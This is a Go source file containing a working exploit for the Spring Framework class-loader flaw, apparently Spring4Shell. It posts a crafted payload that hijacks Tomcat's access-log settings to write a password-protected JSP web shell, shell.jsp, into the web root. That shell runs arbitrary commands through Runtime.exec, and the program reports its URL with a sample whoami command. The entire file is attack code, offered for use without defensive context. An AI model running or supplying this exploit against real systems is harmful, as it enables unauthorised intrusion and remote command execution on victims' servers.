exploit.go

package main

import (
	"bytes"
	"crypto/tls"
	"log"
	"net/http"
	"strings"
	"time"
)

func runExploit(url string) (bool, string) {
	//url := "http://127.0.0.1:8082/"
	log.Println("Trying to exploit:", url)

	var data = []byte(`class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22hunt4spring%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`)
	req, err := http.NewRequest("POST", url, bytes.NewBuffer(data))
	if err != nil {
		log.Println(err.Error())
		return false, ""
	}
	req.Header.Set("suffix", "%>//")
	req.Header.Set("c1", "Runtime")
	req.Header.Set("c2", "<%")
	req.Header.Set("DNT", "1")
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	client := &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
		Timeout: 15 * time.Second,
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{
				InsecureSkipVerify: true,
			},
		},
	}

	resp, err := client.Do(req)
	if err != nil {
		return false, ""
	}
	defer resp.Body.Close()
	if resp.StatusCode == 200 {
		url = strings.Join(strings.Split(url, "/")[0:3], "/")
		shellurl := url + "/shell.jsp"
		log.Println("Shell was successfully uploaded! Address:", shellurl+"?pwd=hunt4spring&cmd=whoami")
		return true, shellurl + "?pwd=hunt4spring&cmd=whoami"
	}
	return false, ""
}